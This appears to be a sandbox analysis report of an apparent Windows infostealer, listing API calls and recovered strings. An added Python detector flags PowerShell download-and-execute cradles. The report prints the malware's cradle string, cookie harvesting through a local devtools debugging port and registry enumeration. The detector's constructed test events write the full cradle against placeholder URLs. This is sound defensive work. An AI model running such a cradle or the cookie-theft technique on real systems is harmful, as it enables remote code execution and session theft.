                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FCBF46
                                  • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 00FCBF66
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCBF88
                                  • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 00FCBF94
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FCBFBA
                                  • ShellExecuteEx.SHELL32(?), ref: 00FCC00C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  • API String ID: 4016326548-898575020
                                  • Opcode ID: e47a657d5c0ae8ba5704d5a861271199ca7b027dbef6ee7a5e9f300a9666e53e
                                  • Instruction ID: 689cbf3aaaa4d1b82341074c8cf3b54cbd685efa18edb60be37f3ee5b8cb29d2
                                  • Opcode Fuzzy Hash: e47a657d5c0ae8ba5704d5a861271199ca7b027dbef6ee7a5e9f300a9666e53e
                                  • Instruction Fuzzy Hash: 9A61BD35E1020A9BCB21BFF68D8BAEE7BA9AF44710F04042DF515E7201DB38D941AF91
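The routine above concatenates a hard-coded host path (C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), the prefix -nop -c "iex(New-Object Net.WebClient).DownloadString(', a URL and the suffix ')", then launches the result with ShellExecuteEx. Because the host path is hard-coded to SysWOW64, the 32-bit PowerShell is started even on 64-bit Windows. The detector below is an added example in Python, not code from the sample or from Joe Sandbox: it runs over process-creation records (image, parent image, command line; all records here are constructed, with URLs on the reserved example.invalid domain) and flags the cradle by its parts rather than the exact string, so it also catches the spelled-out Invoke-Expression / System.Net.WebClient form and pwsh.exe, and it recovers the spliced-in URL for blocking.

```python
"""Added detection example (not code from the sample or from Joe Sandbox).

Flags process-creation events that match the download-and-execute cradle
the routine above assembles before ShellExecuteEx:
    <powershell.exe> -nop -c "iex(New-Object Net.WebClient).DownloadString('<url>')"
and recovers the URL the sample splices into the middle. Events below are
constructed; the URLs use the reserved example.invalid domain.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

POWERSHELL_IMAGES = ("powershell.exe", "pwsh.exe")

# The pieces of the cradle, matched independently so argument order, spacing
# and long/short parameter names do not matter. PowerShell accepts any
# unambiguous prefix of a parameter name, hence -nop/-NoProfile, -c/-Command.
RE_NOPROFILE = re.compile(r"(?<!\S)-nop\w*", re.I)
RE_COMMAND = re.compile(r"(?<!\S)-c(?:o(?:m(?:m(?:a(?:n(?:d)?)?)?)?)?)?\b", re.I)
RE_IEX = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)
RE_DOWNLOADSTRING = re.compile(
    r"new-object\s+(?:system\.)?net\.webclient\s*\)\s*\.\s*downloadstring\s*\(\s*"
    r"['\"]([^'\"]+)['\"]\s*\)", re.I)


@dataclass
class Finding:
    suspicious: bool
    url: Optional[str]
    indicators: List[str] = field(default_factory=list)
    context: str = ""


def analyze_process_event(image: str, command_line: str, parent_image: str = "") -> Finding:
    """Classify one process-creation record.

    The verdict requires the two halves of the cradle together: a string
    fetched with Net.WebClient.DownloadString and fed straight to
    iex/Invoke-Expression. -nop and -c are recorded as supporting
    indicators only, since administrators use them legitimately."""
    exe = image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if exe not in POWERSHELL_IMAGES:
        return Finding(False, None, [], "not a PowerShell host")
    cl = " ".join(command_line.split())  # collapse whitespace and line breaks
    indicators: List[str] = []
    if RE_NOPROFILE.search(cl):
        indicators.append("-nop: profile skipped")
    if RE_COMMAND.search(cl):
        indicators.append("-c: inline command")
    iex = RE_IEX.search(cl) is not None
    if iex:
        indicators.append("iex/Invoke-Expression")
    m = RE_DOWNLOADSTRING.search(cl)
    url = m.group(1) if m else None
    if m:
        indicators.append("Net.WebClient.DownloadString")
    context = f"parent={parent_image or '?'}"
    if "\\syswow64\\" in image.lower():
        # The sample hard-codes the SysWOW64 host, so the 32-bit PowerShell
        # is started even on 64-bit Windows.
        context += "; 32-bit PowerShell host from SysWOW64"
    return Finding(m is not None and iex, url, indicators, context)


def scan_events(events: List[Dict[str, str]]) -> List[Tuple[int, Finding]]:
    """Return (index, finding) for every event judged to be a cradle."""
    out = []
    for i, e in enumerate(events):
        f = analyze_process_event(e.get("Image", ""), e.get("CommandLine", ""), e.get("ParentImage", ""))
        if f.suspicious:
            out.append((i, f))
    return out


# Constructed records using Sysmon Event ID 1 field names.
SAMPLE_EVENTS = [
    {   # 0: the cradle exactly as the sample assembles it (placeholder URL)
        "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Users\user\Desktop\file.exe",
        "CommandLine": r'''"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -nop -c "iex(New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')"''',
    },
    {   # 1: benign administrative use of the same two switches
        "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r'pwsh.exe -NoProfile -Command "Get-Process | Select-Object -First 5"',
    },
    {   # 2: not a PowerShell host at all
        "Image": r"C:\Windows\System32\cmd.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r'cmd.exe /c echo iex DownloadString',
    },
    {   # 3: spelled-out variant of the same cradle
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\wscript.exe",
        "CommandLine": r'''powershell.exe -NoP -NonI -W Hidden -Command "Invoke-Expression ((New-Object System.Net.WebClient).DownloadString('https://example.invalid/x'))"''',
    },
]

if __name__ == "__main__":
    for i, f in scan_events(SAMPLE_EVENTS):
        print(f"event {i}: url={f.url} indicators={f.indicators} ({f.context})")
```

The verdict deliberately rests on DownloadString feeding iex, not on -nop or -c, which appear in plenty of legitimate scripts; the parent image and the SysWOW64 note are carried along so an analyst can see at a glance that a 32-bit non-PowerShell parent (here the sample itself) spawned the host.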
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FD184F
                                  • lstrlen.KERNEL32(01B87218), ref: 00FD1860
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FD1887
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FD1892
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FD18C1
                                  • lstrlen.KERNEL32(00FE4FA0), ref: 00FD18D3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FD18F4
                                  • lstrcat.KERNEL32(00000000,00FE4FA0), ref: 00FD1900
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FD192F
                                  • lstrlen.KERNEL32(01B873A8), ref: 00FD1945
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FD196C
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FD1977
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FD19A6
                                  • lstrlen.KERNEL32(00FE4FA0), ref: 00FD19B8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FD19D9
                                  • lstrcat.KERNEL32(00000000,00FE4FA0), ref: 00FD19E5
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FD1A14
                                  • lstrlen.KERNEL32(01B87278), ref: 00FD1A2A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FD1A51
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FD1A5C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FD1A8B
                                  • lstrlen.KERNEL32(01B87228), ref: 00FD1AA1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FD1AC8
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FD1AD3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FD1B02
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  Similarity
                                  • API ID: lstrcpy$lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1049500425-0
                                  • Opcode ID: 7622aff46c829b088dc4bd58c34129ccceb6b4a85ea08f4e6f65e21ec8194b5a
                                  • Instruction ID: 6cb21535f4cf5a76aeee35d4a194d1418c93db182213ce31872fb60828cf8c19
                                  • Opcode Fuzzy Hash: 7622aff46c829b088dc4bd58c34129ccceb6b4a85ea08f4e6f65e21ec8194b5a
                                  • Instruction Fuzzy Hash: DC913E71A01706ABD720EFF6DC98A56B7EDBF04314B184439A896D7345DB38E881EB60
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC4793
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00FC47C5
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC4812
                                  • lstrlen.KERNEL32(00FE4B60), ref: 00FC481D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC483A
                                  • lstrcat.KERNEL32(00000000,00FE4B60), ref: 00FC4846
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC486B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC4898
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC48A3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC48CA
                                  • StrStrA.SHLWAPI(?,00000000), ref: 00FC48DC
                                  • lstrlen.KERNEL32(?), ref: 00FC48F0
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC4931
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC49B8
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC49E1
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC4A0A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC4A30
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC4A5D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                                  • String ID: ^userContextId=4294967295$moz-extension+++
                                  • API String ID: 4107348322-3310892237
                                  • Opcode ID: 54d18508358f32b8921be44fe79ab0df6c4c52f0aed4e36e11d4a098cdc8907d
                                  • Instruction ID: d24e427b3c16a595e48e1cc26bc16ba765b7f73433bad05884c7d0b341d751de
                                  • Opcode Fuzzy Hash: 54d18508358f32b8921be44fe79ab0df6c4c52f0aed4e36e11d4a098cdc8907d
                                  • Instruction Fuzzy Hash: D1B17E31E1120A9BDB25FFB5DD96A9E77B9AF44310F05442CF856AB341DB38EC01AB90
                                  APIs
                                    • Part of subcall function 00FB90C0: InternetOpenA.WININET(00FDCFEC,00000001,00000000,00000000,00000000), ref: 00FB90DF
                                    • Part of subcall function 00FB90C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00FB90FC
                                    • Part of subcall function 00FB90C0: InternetCloseHandle.WININET(00000000), ref: 00FB9109
                                  • strlen.MSVCRT ref: 00FB92E1
                                  • strlen.MSVCRT ref: 00FB92FA
                                    • Part of subcall function 00FB8980: std::_Xinvalid_argument.LIBCPMT ref: 00FB8996
                                  • strlen.MSVCRT ref: 00FB9399
                                  • strlen.MSVCRT ref: 00FB93E6
                                  • lstrcat.KERNEL32(?,cookies), ref: 00FB9547
                                  • lstrcat.KERNEL32(?,00FE1794), ref: 00FB9559
                                  • lstrcat.KERNEL32(?,?), ref: 00FB956A
                                  • lstrcat.KERNEL32(?,00FE4B98), ref: 00FB957C
                                  • lstrcat.KERNEL32(?,?), ref: 00FB958D
                                  • lstrcat.KERNEL32(?,.txt), ref: 00FB959F
                                  • lstrlen.KERNEL32(?), ref: 00FB95B6
                                  • lstrlen.KERNEL32(?), ref: 00FB95DB
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB9614
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                                  • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                  • API String ID: 1201316467-3542011879
                                  • Opcode ID: d02a40194f06893a6bdc0fe1244f577df20cbea321825d7d2cb1ae406904f763
                                  • Instruction ID: 410cfd58863b2c0d3cd4b0047f4a338c4369f9b10556b0f5c9820465dd1c203a
                                  • Opcode Fuzzy Hash: d02a40194f06893a6bdc0fe1244f577df20cbea321825d7d2cb1ae406904f763
                                  • Instruction Fuzzy Hash: 41E14671E14218DBDF50EFA9C880ADEBBF5BF48300F1444A9E609A7241DB74AE45EF91
                                  APIs
                                  • memset.MSVCRT ref: 00FCD9A1
                                  • memset.MSVCRT ref: 00FCD9B3
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00FCD9DB
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCDA0E
                                  • lstrcat.KERNEL32(?,00000000), ref: 00FCDA1C
                                  • lstrcat.KERNEL32(?,01B9E0B8), ref: 00FCDA36
                                  • lstrcat.KERNEL32(?,?), ref: 00FCDA4A
                                  • lstrcat.KERNEL32(?,01B9D640), ref: 00FCDA5E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCDA8E
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00FCDA95
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FCDAFE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                                  • String ID:
                                  • API String ID: 2367105040-0
                                  • Opcode ID: 07213762bc7ded6cd4b4d9bc0d191fbda2182446f896b45adc45ad9dda5b3261
                                  • Instruction ID: 4161d5a9e0a3a75c0971a303043ee12b404e99ec7b8693a3ca37ca492433a4a3
                                  • Opcode Fuzzy Hash: 07213762bc7ded6cd4b4d9bc0d191fbda2182446f896b45adc45ad9dda5b3261
                                  • Instruction Fuzzy Hash: FDB1B071D1021A9FCB24EFA4DC85EEE7BB9AF88300F044579E516A7241DB389E44EF90
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FBB330
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBB37E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBB3A9
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FBB3B1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBB3D9
                                  • lstrlen.KERNEL32(00FE4C50), ref: 00FBB450
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBB474
                                  • lstrcat.KERNEL32(00000000,00FE4C50), ref: 00FBB480
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBB4A9
                                  • lstrlen.KERNEL32(00000000), ref: 00FBB52D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBB557
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FBB55F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBB587
                                  • lstrlen.KERNEL32(00FE4AD4), ref: 00FBB5FE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBB622
                                  • lstrcat.KERNEL32(00000000,00FE4AD4), ref: 00FBB62E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBB65E
                                  • lstrlen.KERNEL32(?), ref: 00FBB767
                                  • lstrlen.KERNEL32(?), ref: 00FBB776
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBB79E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat
                                  • String ID:
                                  • API String ID: 2500673778-0
                                  • Opcode ID: 6eb40f62c4f280122e0a73a2581c45bb5618321cc94113368572f914cf605a54
                                  • Instruction ID: 23e8a6a7169d8cc350e3fa7846e7c03869423f8c47ec55afc3c68aa200e1d388
                                  • Opcode Fuzzy Hash: 6eb40f62c4f280122e0a73a2581c45bb5618321cc94113368572f914cf605a54
                                  • Instruction Fuzzy Hash: 11024F30E01205CFDB29DF96D988AAAB7F5AF40324F19806DE4099B355D7B5DC82EF81
                                  APIs
                                    • Part of subcall function 00FD71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00FD71FE
                                  • RegOpenKeyExA.ADVAPI32(?,01B9B418,00000000,00020019,?), ref: 00FD37BD
                                  • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00FD37F7
                                  • wsprintfA.USER32 ref: 00FD3822
                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00FD3840
                                  • RegCloseKey.ADVAPI32(?), ref: 00FD384E
                                  • RegCloseKey.ADVAPI32(?), ref: 00FD3858
                                  • RegQueryValueExA.ADVAPI32(?,01B9E730,00000000,000F003F,?,?), ref: 00FD38A1
                                  • lstrlen.KERNEL32(?), ref: 00FD38B6
                                  • RegQueryValueExA.ADVAPI32(?,01B9E6D0,00000000,000F003F,?,00000400), ref: 00FD3927
                                  • RegCloseKey.ADVAPI32(?), ref: 00FD3972
                                  • RegCloseKey.ADVAPI32(?), ref: 00FD3989
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                                  • String ID: - $%s\%s$?
                                  • API String ID: 13140697-3278919252
                                  • Opcode ID: 9c71d9bec0f5464eb09fd42a15255bb2e23c310b92b8f1eaef3a7eabca4ef3bd
                                  • Instruction ID: 4a54a7f0f2dfd8e08195b667c95dc7fbcd6f116733dd865b3c5414ca8ae58aab
                                  • Opcode Fuzzy Hash: 9c71d9bec0f5464eb09fd42a15255bb2e23c310b92b8f1eaef3a7eabca4ef3bd
                                  • Instruction Fuzzy Hash: 14915C72D002089FCB24DFD4D9849EEB7BAFB48314F18856AE609AB305D735AE41DF91
                                  APIs
                                  • InternetOpenA.WININET(00FDCFEC,00000001,00000000,00000000,00000000), ref: 00FB90DF
                                  • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00FB90FC
                                  • InternetCloseHandle.WININET(00000000), ref: 00FB9109
                                  • InternetReadFile.WININET(?,?,?,00000000), ref: 00FB9166
                                  • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00FB9197
                                  • InternetCloseHandle.WININET(00000000), ref: 00FB91A2
                                  • InternetCloseHandle.WININET(00000000), ref: 00FB91A9
                                  • strlen.MSVCRT ref: 00FB91BA
                                  • strlen.MSVCRT ref: 00FB91ED
                                  • strlen.MSVCRT ref: 00FB922E
                                  • strlen.MSVCRT ref: 00FB924C
                                    • Part of subcall function 00FB8980: std::_Xinvalid_argument.LIBCPMT ref: 00FB8996
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                                  • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                  • API String ID: 1530259920-2144369209
                                  • Opcode ID: 037e127023b8d7dea2eac47a3a6059e11f0928478291ba9ef6e06586bd6fdeeb
                                  • Instruction ID: 62e1baed109780cc9513cbd07596d9ed8930bc0a3367c22f05e08df385714394
                                  • Opcode Fuzzy Hash: 037e127023b8d7dea2eac47a3a6059e11f0928478291ba9ef6e06586bd6fdeeb
                                  • Instruction Fuzzy Hash: C951B671A00205ABDB20DBE9DC45FDEB7FEDB84710F140069F504E7281DBB5E944ABA6
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 00FD16A1
                                  • lstrcpy.KERNEL32(00000000,01B8B7E8), ref: 00FD16CC
                                  • lstrlen.KERNEL32(?), ref: 00FD16D9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FD16F6
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FD1704
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FD172A
                                  • lstrlen.KERNEL32(01B9AA70), ref: 00FD173F
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FD1762
                                  • lstrcat.KERNEL32(00000000,01B9AA70), ref: 00FD176A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FD1792
                                  • ShellExecuteEx.SHELL32(?), ref: 00FD17CD
                                  • ExitProcess.KERNEL32 ref: 00FD1803
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                                  • String ID: <
                                  • API String ID: 3579039295-4251816714
                                  • Opcode ID: 9d674171a6e54bd7fd0a022b916179a21cbafc30b550b8fb3913d7f2703dcc66
                                  • Instruction ID: 9e3940ec831765892062f4b26d3b7e9456ead1b50e09dc5635ae0a0d401050c6
                                  • Opcode Fuzzy Hash: 9d674171a6e54bd7fd0a022b916179a21cbafc30b550b8fb3913d7f2703dcc66
                                  • Instruction Fuzzy Hash: 61519E70D01219ABDB65EFE5C884A9EBBFABF44310F044036A515E7344DB34AE41EB90
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCEFE4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCF012
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00FCF026
                                  • lstrlen.KERNEL32(00000000), ref: 00FCF035
                                  • LocalAlloc.KERNEL32(00000040,00000001), ref: 00FCF053
                                  • StrStrA.SHLWAPI(00000000,?), ref: 00FCF081
                                  • lstrlen.KERNEL32(?), ref: 00FCF094
                                  • lstrlen.KERNEL32(00000000), ref: 00FCF0B2
                                  • lstrcpy.KERNEL32(00000000,ERROR), ref: 00FCF0FF
                                  • lstrcpy.KERNEL32(00000000,ERROR), ref: 00FCF13F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$AllocLocal
                                  • String ID: ERROR
                                  • API String ID: 1803462166-2861137601
                                  • Opcode ID: ce3a9fdea184a5be80f90cafb2312d9ab2a608451c616d7566ec7ddff9bbfd1b
                                  • Instruction ID: a298794e379c6a517241c052276bb0f97313bcc8cd3292dc7b5720b1233bd82c
                                  • Opcode Fuzzy Hash: ce3a9fdea184a5be80f90cafb2312d9ab2a608451c616d7566ec7ddff9bbfd1b
                                  • Instruction Fuzzy Hash: FE5180319101469FCB31AFB5DD4AFAAB7E9AF41720F05406CE8499B206DB38DC05AB91
                                  APIs
                                  • GetEnvironmentVariableA.KERNEL32(01B98F38,011E9BD8,0000FFFF), ref: 00FBA026
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FBA053
                                  • lstrlen.KERNEL32(011E9BD8), ref: 00FBA060
                                  • lstrcpy.KERNEL32(00000000,011E9BD8), ref: 00FBA08A
                                  • lstrlen.KERNEL32(00FE4C4C), ref: 00FBA095
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBA0B2
                                  • lstrcat.KERNEL32(00000000,00FE4C4C), ref: 00FBA0BE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBA0E4
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FBA0EF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBA114
                                  • SetEnvironmentVariableA.KERNEL32(01B98F38,00000000), ref: 00FBA12F
                                  • LoadLibraryA.KERNEL32(01B9D790), ref: 00FBA143
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                  • String ID:
                                  • API String ID: 2929475105-0
                                  • Opcode ID: 13758cb80f883d8b0d29ae9bc75cd19a6df2b0a3a2974a5fdbea0c127cecaf9b
                                  • Instruction ID: 57e9276e65f43e9625f04a3b377e806672662dbaf0486aca2199a91abf42629f
                                  • Opcode Fuzzy Hash: 13758cb80f883d8b0d29ae9bc75cd19a6df2b0a3a2974a5fdbea0c127cecaf9b
